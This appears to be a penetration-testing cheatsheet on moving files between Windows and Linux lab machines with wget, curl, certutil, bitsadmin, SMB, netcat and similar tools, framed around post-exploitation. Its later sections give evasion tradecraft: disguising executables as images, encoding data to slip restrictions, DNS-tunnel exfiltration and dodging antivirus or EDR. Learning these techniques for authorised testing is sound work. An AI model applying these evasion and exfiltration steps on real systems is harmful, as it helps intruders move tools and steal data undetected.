File Transfer Cheatsheet: Windows and Linux
File transfer is a critical component in post-exploitation, penetration testing, and red teaming.
File transfer is a critical component in post-exploitation, penetration testing, and red teaming. Different environments require specific approaches, so it’s essential to have a versatile set of techniques at your disposal. This guide covers practical, step-by-step methods for transferring files on Windows and Linux, providing multiple options to ensure you’re prepared for any situation.
1. Lab Setup
Setting up an isolated testing environment is key to safely practicing file transfers. Use VirtualBox, VMware, or cloud-based VMs to create separate Windows and Linux instances, and ensure they can communicate.
Example Lab Configuration:
Linux Server: IP 192.168.1.100
Windows Server: IP 192.168.1.101
2. File Transfer using Wget
Wget is a command-line utility available by default on Linux and can be installed on Windows. It’s especially useful for downloading files over HTTP, HTTPS, or FTP.
Linux to Linux or Linux to Windows:
Start a Python HTTP server on the Linux machine (explained in Section 13).
python3 -m http.server 8080On the destination machine, download the file using wget:
wget http://192.168.1.100:8080/file.txtWindows with Wget Installed:
Install Wget on Windows if it’s not already available.
Run the following command:
wget http://192.168.1.100:8080/file.txt -OutFile C:\Users\Public\file.txt3. File Transfer using Curl
Curl supports various protocols, including HTTP, HTTPS, and FTP, and is pre-installed on Linux. On Windows, PowerShell includes a built-in alias for Curl.
Linux to Linux or Linux to Windows:
Start a Python HTTP server on the source machine.
On the target, use Curl to download:
curl -O http://192.168.1.100:8080/file.txtWindows PowerShell:
Use the following command to download to a specified path:
curl -o C:\Users\Public\file.txt http://192.168.1.100:8080/file.txt4. File Transfer using Certutil (Windows Only)
Certutil is a built-in Windows tool commonly used for managing certificates, but it also supports file downloads, making it ideal in restrictive environments.
Start a Python HTTP server on the Linux machine.
On the Windows target, use Certutil to download the file:
certutil -urlcache -f http://192.168.1.100:8080/file.txt C:\Users\Public\file.txtVerify the file download by checking the destination directory.
5. File Transfer using Bitsadmin (Windows Only)
BITSAdmin, another Windows utility, uses the Background Intelligent Transfer Service (BITS) to manage file downloads in the background.
On the Windows machine, open a PowerShell terminal.
Run the following command:
bitsadmin /transfer mydownload /download /priority normal http://192.168.1.100:8080/file.txt C:\Users\Public\file.txtCheck the Transfer Status:
bitsadmin /info mydownload /verbose6. File Transfer using PowerShell
PowerShell’s Invoke-WebRequest is another option for downloading files on Windows, useful for HTTP-based transfers.
Start a Python HTTP server on the source machine.
On the target Windows machine, use:
Invoke-WebRequest -Uri http://192.168.1.100:8080/file.txt -OutFile C:\Users\Public\file.txt7. File Transfer using SMB Server (Linux to Windows)
SMB (Server Message Block) is a network file-sharing protocol, and Linux machines can act as SMB servers using Samba.
On Linux (Setting up the SMB Server):
Install Samba:
sudo apt-get install sambaConfigure the smb.conf file to share a directory:
[share]
path = /path/to/share
browsable = yes
writable = yes
guest ok = yesRestart Samba:
sudo systemctl restart smbdOn Windows (Accessing the SMB Share):
Open PowerShell and map the SMB share:
net use Z: \\192.168.1.100\share /user:guestNavigate to Z: and copy the file to your destination folder:
copy Z:\file.txt C:\Users\Public\file.txt8. File Transfer using SCP (Linux and Windows)
SCP (Secure Copy Protocol) is commonly used for secure file transfers over SSH.
Linux to Linux:
Run SCP with a remote destination path:
scp file.txt user@192.168.1.101:/path/to/destination/Linux to Windows (using OpenSSH on Windows):
Open PowerShell and run:
scp file.txt user@192.168.1.101:"C:\Users\Public\file.txt"9. File Transfer using TFTP (Trivial File Transfer Protocol)
TFTP is a simple transfer protocol with limited functionality and no encryption, ideal for quick transfers in controlled networks.
On Linux (TFTP Server):
Install and start a TFTP server:
sudo apt install tftp
sudo systemctl start tftpdPlace the file in the TFTP directory (e.g., /srv/tftp).
On Windows (TFTP Client):
Use the TFTP client to get the file:
tftp -i 192.168.1.100 GET file.txt C:\Users\Public\file.txt10. File Transfer using FTP (File Transfer Protocol)
FTP is a more robust option but lacks encryption by default.
On Linux (FTP Server):
Install and start an FTP server (e.g., vsftpd).
sudo apt install vsftpd
sudo systemctl start vsftpdPlace the file in the FTP directory (e.g., /srv/ftp).
On Windows (FTP Client):
Open a PowerShell terminal and connect:
ftp 192.168.1.100Download the file using get file.txt.
11. File Transfer using HTTP Server
The Python HTTP server is quick and efficient for short-term file sharing over HTTP.
On Linux (Start HTTP Server):
Start the server in the file directory:
python3 -m http.server 8080On Windows (Download via Browser or PowerShell):
Open a browser and navigate to http://192.168.1.100:8080/file.txt to download, or:
Invoke-WebRequest -Uri http://192.168.1.100:8080/file.txt -OutFile C:\Users\Public\file.txt12. File Transfer using Netcat (nc)
Netcat is a versatile utility that can transfer files directly over a TCP/UDP connection.
On Linux (Act as Server):
Run the following to listen on port 4444:
nc -lvnp 4444 < file.txtOn Windows (Receive the File):
Use the following to connect and save the file:
nc 192.168.1.100 4444 > C:\Users\Public\file.txt13. File Transfer using Python SimpleHTTPServer (Python 2)
For legacy support, Python 2 has a built-in SimpleHTTPServer module.
Start the server on the source machine (Linux or Windows) by running:
python -m SimpleHTTPServer 8080On the target machine, use your preferred method (e.g., wget, curl, browser) to download the file from http://192.168.1.100:8080/file.txt.
This approach works similarly to Python 3’s http.server, but keep in mind that Python 2 is deprecated and might not be available on all systems.
14. Advanced Techniques for Secure and Stealthy File Transfer
Some situations call for more secure or stealthy file transfer methods to avoid detection. Here are a few advanced approaches:
Obfuscate File Names and Extensions: Rename sensitive files to non-suspicious names, or change extensions (e.g., file.exe to file.jpg) to avoid automated security detection.
Use Encryption: Encrypt files using tools like gpg on Linux before transfer to add an extra layer of security:
gpg -c file.txt # Encrypts with a passphraseOn the destination, decrypt with:
gpg file.txt.gpgEncoded Transfers in PowerShell: If restricted, use base64 encoding to transfer text-based data:
$content = Get-Content C:\path\to\file.txt
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($content))
Write-Output $encoded > encoded.txtOn the target, decode it:
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((Get-Content encoded.txt))) | Out-File C:\path\to\decoded.txtData Exfiltration via DNS Tunneling: For highly covert transfers, encode data in DNS requests using tools like dnscat2 or iodine, though this is often limited by network restrictions.
15. Troubleshooting File Transfers
Issues can arise during file transfers, especially on restricted or locked-down environments. Here are some tips to address common problems:
Network Connectivity: Ensure that both machines are on the same network and that there are no firewall rules or network restrictions blocking the transfer ports.
Antivirus or EDR Detection: Rename files, change extensions, or zip/encrypt files to avoid triggering security alerts. Using PowerShell and Bitsadmin is generally less likely to be flagged than using certutil or nc.
Permissions: Ensure you have the necessary permissions on both source and destination directories. On Linux, use chmod to set permissions, and on Windows, check folder security settings.
Correct Paths and Commands: Double-check file paths, IP addresses, and syntax, especially on different platforms (Linux vs. Windows syntax).
File transfer methods vary widely, and knowing multiple techniques is essential for adapting to different operating environments and security restrictions. From simple HTTP servers to advanced tools like SMB and SCP, this guide equips you with practical, step-by-step instructions for nearly any file transfer scenario you may encounter. Remember to test and practice these methods in a controlled lab environment to familiarize yourself with each tool’s behavior and limitations.
Last updated
Was this helpful?